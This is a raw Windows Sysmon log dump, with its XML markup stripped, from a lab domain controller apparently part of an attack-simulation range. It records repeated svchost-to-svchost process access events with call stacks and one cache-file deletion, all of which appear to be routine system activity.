12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005455Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005454Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005453Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005452Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005451Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005450Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005449Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005448Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005447Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005446Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005445Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005444Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005443Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005442Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.255{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005441Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005440Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005439Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005438Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005437Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005436Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005435Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64C6-6064-A900-00000000AE01}3404C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005434Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:18.239{266CAFBE-64C6-6064-A900-00000000AE01}3404NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\SystemApps\Microsoft.Windows.AppRep.ChxApp_cw5n1h2txyewy\microsoft.system.package.metadata\Autogen\JSByteCodeCache_64MD5=1036E3DDDC89A4E68D8A33F3823A180E,SHA256=FB5E512425FC9449316EC95969EBE71E2D576DBAB833D61E2A5B9330FD70EE02,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005433Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 